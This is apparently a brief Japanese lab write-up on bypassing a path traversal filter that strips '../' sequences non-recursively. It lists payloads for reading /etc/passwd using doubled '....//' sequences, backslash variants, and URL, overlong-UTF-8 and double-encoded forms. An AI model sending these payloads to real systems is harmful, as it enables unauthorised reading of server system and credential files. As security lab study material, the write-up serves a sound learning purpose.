Hello there, ('ω')ノ 

 

非再帰的にストリッピングされたトラバーサルシーケンスを。

 

 

下記のペイロードを入力してSendして。

　....//....//....//etc/passwd

 

 

クリアできた。

 

 

特殊文字は非再帰的にフィルタリングされるので二重に書き込むことができて。

http://example.com/index.php?page=....//....//....//etc/passwd
http://example.com/index.php?page=....\/....\/....\/etc/passwd
http://some.domain.com/static/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd

 

また、非標準のエンコーディング（例：...%c0%af、..%252f) を使用して。

フィルタリングをバイパスできる場合もあって。

 

下記は、不要なURLデコードで削除されたトラバーサルシーケンスで。

　..%252f..%252f..%252fetc/passwd

 

Best regards, (^^ゞ